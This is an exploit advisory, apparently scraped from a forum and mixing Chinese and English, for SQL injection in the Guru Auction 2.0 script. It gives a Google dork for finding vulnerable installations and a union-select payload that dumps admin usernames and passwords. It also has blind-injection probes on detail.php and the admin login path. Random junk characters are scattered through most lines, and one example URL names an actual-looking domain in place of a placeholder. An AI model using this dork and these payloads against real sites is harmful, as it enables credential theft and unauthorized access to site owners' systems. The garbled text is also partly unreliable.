Guru Auction 2.0 Multiple SQL Injection Vulnerabilities; y" z* p$ J1 r
0 X9 a6 G7 C6 r0 ^: o- X* S作者 : v3n0m$ @4 X8 y, c6 ~/ x! c, q1 s, r
应用 : Guru Auction 2.0
, |! l" U6 M; }# aPrice : $49
* \+ u. V. n1 M- C8 zVendor : http://www.guruscript.com/
8 [- k% a6 i! K0 {Google Dork : inurl:subcat.php?cate_id=. V2 x3 D# z$ @- m9 o: B7 j
7 m \1 Z' \; C% uSQLi p0c:% G4 r( Q& O7 s6 K* ?
~~~~~~~~~~5 [% ?6 H$ S# j
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
. ~. H3 S& f% _5 w# M
, R9 H d. U5 K" X' x' ~8 n( {/ j& l
$ s4 d+ ^2 F/ M: O2 e- ]盲注 p0c:! J8 I" L, P* ^+ D3 j& U5 Z4 [: W
~~~~~~~~~~- S( h4 I, ]- D' }9 u! N2 D7 p+ `% Z
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true) S4 I8 r: ]. M3 a( y9 R) p
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false8 Z+ m: B# D! s
+ A, v% I% ~( o y7 g管理登录入口:
% h5 { |' v% `- Q- j o4 K* n~~~~~~~~~~
( e% ^1 d- u/ ]! Rhttp://domain.tld/[path]/admin/- S/ `" a& z! D& H' x- _9 c
|